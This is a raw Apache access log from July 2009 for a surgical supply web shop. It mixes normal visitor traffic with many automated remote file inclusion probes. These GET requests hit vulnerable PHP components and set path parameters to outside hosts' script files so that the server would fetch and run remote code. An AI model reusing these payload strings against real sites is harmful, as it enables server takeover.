83.98.209.71 - - [01/Jul/2009:07:31:00 -0400] "GET /logs/access_log.Q109061600%20%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:07:31:23 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.77.32.217 - - [01/Jul/2009:07:31:23 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.77.32.217 - - [01/Jul/2009:07:31:23 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
62.77.32.217 - - [01/Jul/2009:07:31:24 -0400] "GET /logs/access_log.Q109061600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
202.181.243.113 - - [01/Jul/2009:07:31:26 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:07:31:29 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
83.98.209.71 - - [01/Jul/2009:07:31:29 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
83.98.209.71 - - [01/Jul/2009:07:31:29 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
83.98.209.71 - - [01/Jul/2009:07:31:35 -0400] "GET /logs/access_log.Q109061600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
62.77.32.217 - - [01/Jul/2009:07:31:40 -0400] "GET /logs/access_log.Q109061600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.181.243.113 - - [01/Jul/2009:07:31:43 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:07:31:54 -0400] "GET /logs/access_log.Q109061700/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:31:54 -0400] "GET /logs/access_log.Q109061700/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:31:54 -0400] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:31:54 -0400] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:32:16 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:32:16 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:07:32:20 -0400] "GET /logs/access_log.Q109061700/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:32:20 -0400] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:32:20 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 7716 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:32:21 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:32:22 -0400] "GET /logs/access_log.Q109061700/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:32:22 -0400] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:32:22 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 7716 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:32:23 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
212.241.249.222 - - [01/Jul/2009:07:32:26 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ssp3.ilawa.pl/images/zoom/.bjc/logs/uk1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:07:32:33 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?redir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:07:32:33 -0400] "GET /logs//index.php?redir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:07:32:33 -0400] "GET //index.php?redir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:07:32:42 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?redir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:07:33:05 -0400] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:07:33:06 -0400] "GET /?DOCUMENT_ROOT=http://www.pbxschool.com/zb41/data/ido.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
62.77.32.217 - - [01/Jul/2009:07:33:21 -0400] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:07:33:21 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:07:33:23 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:07:33:43 -0400] "GET /logs/access_log.Q109061600/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:35:12 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:35:36 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:35:36 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:35:36 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.207.160.102 - - [01/Jul/2009:07:35:44 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:35:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.98.222.18 - - [01/Jul/2009:07:35:56 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:35:56 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:35:56 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
217.147.29.190 - - [01/Jul/2009:07:36:00 -0400] "GET /logs/access_log.Q109061400//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:07:36:06 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:36:11 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:36:14 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.122.38.122 - - [01/Jul/2009:07:37:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:37:22 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:37:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:37:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
66.249.134.74 - - [01/Jul/2009:07:38:23 -0400] "GET /logs/access_log.Q109060900//index.php?redir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.134.74 - - [01/Jul/2009:07:38:25 -0400] "GET /logs/access_log.Q109061900//index.php?redir=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:39:05 -0400] "GET /logs/access_log.Q109052600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:39:05 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:39:05 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.9.234 - - [01/Jul/2009:07:40:11 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
70.86.9.234 - - [01/Jul/2009:07:40:11 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
70.86.9.234 - - [01/Jul/2009:07:40:11 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
89.184.42.77 - - [01/Jul/2009:07:40:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
89.184.42.77 - - [01/Jul/2009:07:40:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
70.86.9.234 - - [01/Jul/2009:07:40:43 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.184.42.77 - - [01/Jul/2009:07:40:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
89.184.42.77 - - [01/Jul/2009:07:40:46 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.94.56.39 - - [01/Jul/2009:07:41:42 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:41:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.56.39 - - [01/Jul/2009:07:41:52 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 262 "-" "Mozilla/5.0"
209.6.234.34 - - [01/Jul/2009:07:41:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
209.6.234.34 - - [01/Jul/2009:07:41:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
200.152.208.66 - - [01/Jul/2009:07:42:05 -0400] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.152.208.66 - - [01/Jul/2009:07:42:05 -0400] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.122.38.122 - - [01/Jul/2009:07:41:59 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45922 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
200.152.208.66 - - [01/Jul/2009:07:42:05 -0400] "GET /logs/access_log.Q109061800%20%20//administrator/components/com_moofaq/css/file_includer.php?file=http://www.cryt.net/bin/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
216.254.103.223 - - [01/Jul/2009:07:42:05 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
216.254.103.223 - - [01/Jul/2009:07:42:05 -0400] "GET //include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
216.254.103.223 - - [01/Jul/2009:07:42:05 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
69.122.38.122 - - [01/Jul/2009:07:42:05 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45922 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:06 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
70.86.9.234 - - [01/Jul/2009:07:42:06 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
69.122.38.122 - - [01/Jul/2009:07:42:07 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:07 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
69.122.38.122 - - [01/Jul/2009:07:42:09 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
